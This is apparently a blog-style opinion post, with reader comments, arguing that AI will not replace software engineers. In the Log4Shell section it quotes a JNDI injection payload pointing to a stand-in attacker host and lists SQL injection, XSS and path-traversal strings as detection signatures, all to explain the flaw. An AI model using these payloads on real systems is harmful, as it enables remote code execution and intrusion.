Will AI Replace Software Engineering? 💭💻

Ever since Jensen Huang, Mark Zuckerberg & Marc Benioff boldly predicted that "2025 will see the end of Mid Software Engineers and with it the start of the end of Software Engineering," the tech world, including my network, has been buzzing. Yet, here we are, three months into 2025, and software engineers are still very much employed.

This debate has sparked heated discussions among my peers, so much so that I figured it's time to weigh in with my own perspective. While AI has undeniably changed how we code (I even did a post on the awesome project I built using "Vibe Coding 😎" [check it out here]), I still believe it's far from making software engineering obsolete, at least not in 2025 or 2026. Here's why.

AI’s Blind Spot: It Learns from Perfection, Not Struggle

AI code generation, as we know it today, originated with GitHub Copilot, which at the time "allegedly" leveraged vast repositories of existing, refined codebases. (Yeah, allegedly, because I'd rather not open that Pandora's box, out of mad respect for the GitHub 10X Devs. Awesome product, by the way. 🫡)

But here's the catch: version control does not capture the failures, idea pivots, dead ends, and mental struggles that lead to the breakthrough behind that final commit or pull request. I'd even argue that's why we invented code comments: to capture some of that thinking for future reference. Code repositories store working solutions, not the meandering paths that led developers to discover them. So it's safe to say that AI, in its current form, learns from the end product, not from the chaotic, messy, iterative process by which the knowledge was uncovered. It can't navigate uncertainty, make productive mistakes, or, sometimes, just get lucky, and that's the bottom line.

What About the Stroke of Human Serendipity? Can AI Replicate That?

Did you know that some of the greatest inventions in history happened by accident? Luck, combined with the ability to recognize hidden potential in failures, has led to some of the most groundbreaking discoveries.

  • Take Penicillin, for example – Alexander Fleming returned from vacation to find mold contaminating his petri dishes. Instead of discarding them, he noticed something remarkable: the mold had killed the surrounding bacteria. That "contamination" became the world’s first antibiotic, saving millions of lives.
  • Or Microwave ovens – Percy Spencer, working with radar technology, noticed that the chocolate bar in his pocket had melted. Intrigued, he tested popcorn kernels near the device, leading to the invention of a kitchen staple.
  • Then there's Super Glue – Dr. Harry Coover was developing materials for wartime optics when he stumbled upon an adhesive so strong it stuck everything together. Originally dismissed as an inconvenience, it later became a revolutionary bonding agent.
  • And Teflon – Roy Plunkett was experimenting with refrigerants when he accidentally created a slippery, heat-resistant coating that would transform cookware forever.
  • And, of course, Gravity – Sir Isaac Newton was said to be sitting under an apple tree when he observed an apple falling straight down. This seemingly ordinary event sparked one of the most fundamental scientific breakthroughs in history.

These are just a few examples, but history has shown time and again that invention follows no single formula: some breakthroughs are simply lucky breaks that most people would have dismissed as failures or everyday occurrences.

So, do you think AI, trained on patterns of success and refined data, can stumble upon the unexpected on its own? It doesn't trip over breakthroughs, because it operates from a structured instruction set. It will never wake up one morning and say, "Oops, I just changed the world, all by myself."

Would AI Have Prevented History's Most Critical Vulnerability: Log4Shell?

Let's take a real-world test case: remember the infamous Log4Shell vulnerability? The flaw was introduced into Apache Log4j 2.x back in 2013 and remained undetected for nearly a decade before finally being disclosed in December 2021. Would AI have caught it sooner?
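
For context, the bug lived in an utterly ordinary-looking pattern. Below is a minimal sketch of the kind of code that was exploitable; the class and method names are my own illustration, not taken from any real codebase:

```java
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

// Hypothetical audit class; countless services logged user input like this.
public class LoginAudit {

    private static final Logger LOG = LogManager.getLogger(LoginAudit.class);

    public void recordFailedAttempt(String username) {
        // On Log4j 2.0-beta9 through 2.14.1, ${...} lookups were evaluated
        // inside the formatted message. A username of
        // "${jndi:ldap://attacker.example.com/a}" made the logger perform a
        // JNDI lookup and load attacker-supplied code: remote code execution
        // from a single, innocent-looking log line.
        LOG.info("Failed login attempt for user: {}", username);
    }
}
```

Nothing about that log line looks wrong, and that's precisely the point: it passed human and automated scrutiny for years.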

One might argue that AI-driven security tools are becoming increasingly advanced. But most still rely on known patterns—previous exploits, common attack vectors, and historical data. The problem? Security threats don’t always follow past patterns.
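
To make that concrete, here's a deliberately naive sketch of what signature-based detection boils down to (a toy illustration of mine, not any real tool's implementation). It can only flag inputs matching patterns it has already been given:

```java
import java.util.List;

public class NaiveSignatureScanner {

    // Hypothetical signature list distilled from past exploits.
    private static final List<String> KNOWN_BAD_PATTERNS = List.of(
        "<script>",          // stored XSS
        "' OR '1'='1",       // classic SQL injection
        "../../etc/passwd"   // path traversal
    );

    static boolean looksMalicious(String input) {
        return KNOWN_BAD_PATTERNS.stream().anyMatch(input::contains);
    }

    public static void main(String[] args) {
        // A known signature is caught...
        System.out.println(looksMalicious("name=' OR '1'='1")); // true
        // ...but a payload shape the scanner has never seen sails through,
        // exactly as "${jndi:...}" did before December 2021.
        System.out.println(looksMalicious("${jndi:ldap://attacker.example.com/a}")); // false
    }
}
```

However large the signature list grows, a scanner like this is always looking backwards; a genuinely novel payload shape matches nothing.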

What makes human-driven cybersecurity effective is intuition, adversarial thinking, and sometimes outright paranoia. The best security researchers aren't just looking for issues that should exist; they're questioning whether something could exist, even when there's no clear evidence yet (out-of-pattern thinking). AI, by contrast, might have reinforced a false sense of security, trusting that widely reviewed code was safe simply because it had passed scrutiny for years, or because some rule proclaimed it immaculate.

If AI had been in charge, do you think it would, in isolation, have flagged the vulnerability earlier? Or would it have simply accepted the code as "working" because everyone else, and every standard, had declared it so?

The Language Paradox: Why I Think AI Will Always Fall Short

Language is humanity’s greatest tool for simplifying thought, yet it still falls short. Words, symbols, and syntax are just approximations of human cognition. We even have phrases like "words can’t do it justice," acknowledging that language itself has limits.

AI models are, at their core, built on language. So if AI were truly capable of fully replacing human thought and reasoning, language itself would have to have achieved that feat first. As of today, over 7,000 languages exist worldwide, each attempting to articulate human experience in its own way, many with overlapping vocabulary. Language has existed in many forms: hieroglyphics, written scripts, spoken dialects, and even programming languages. Yet even with this diversity, no language has perfectly encoded human thought.

If something as evolved as language hasn’t perfectly captured human thought, how can AI, which is just another approximation, ever fully replicate creativity, intuition, and problem-solving?

Conclusion

AI will not replace developers, scientists, or thinkers; it will amplify them. It will automate the tedious surface patterns we might overlook and accelerate innovation. But true invention, the kind that changes history, will always require human intuition, curiosity, and serendipity. And the irony is that AI is itself one of those inventions, yet we talk as if it will be the last of its kind, especially in this space.

My 2 cents: AI is and will continue to act as the main catalyst for efficiency in software engineering, not the replacement.

The year is young, and that is a bold prediction, but we will just have to wait and see.

So, what’s your take?

AI is here to amplify delivery and allow humans to deliver faster.


AI will make super engineers: a single engineer will handle multiple complex tasks within a shorter time. It's more about making them managers and supervisors.

While I do sometimes worry about a "Skynet" situation (alignment problem + AGI), I agree that the current AI capabilities are a long way from replacing software engineers. "AI is and will continue to act as the main catalyst for efficiency in software engineering, not the replacement" Well said and great article!

From my interactions with it as an assistant/copilot, it's a huge productivity booster. It can't yet work fully autonomously in private, production-grade codebases with tens of thousands of lines of code. The context window is still limited, and after a while it starts to "hallucinate". Nor can you confidently use it with an unfamiliar tech stack; more often than not you'll need to step in and fill gaps or debug the code it generates. Where it excels is with widely adopted open-source frameworks: you have a precise idea of the expected outcome, so AI helps generate the code faster, refine it, or even critique it and suggest alternatives. For now engineers are here to stay, though in lean teams with the AI productivity boost. But who knows if tomorrow, in 5 or 10 years, there will be a next-gen LLM that addresses all the existing shortcomings 🤷🏾‍♂️ Very unpredictable trajectory ahead!

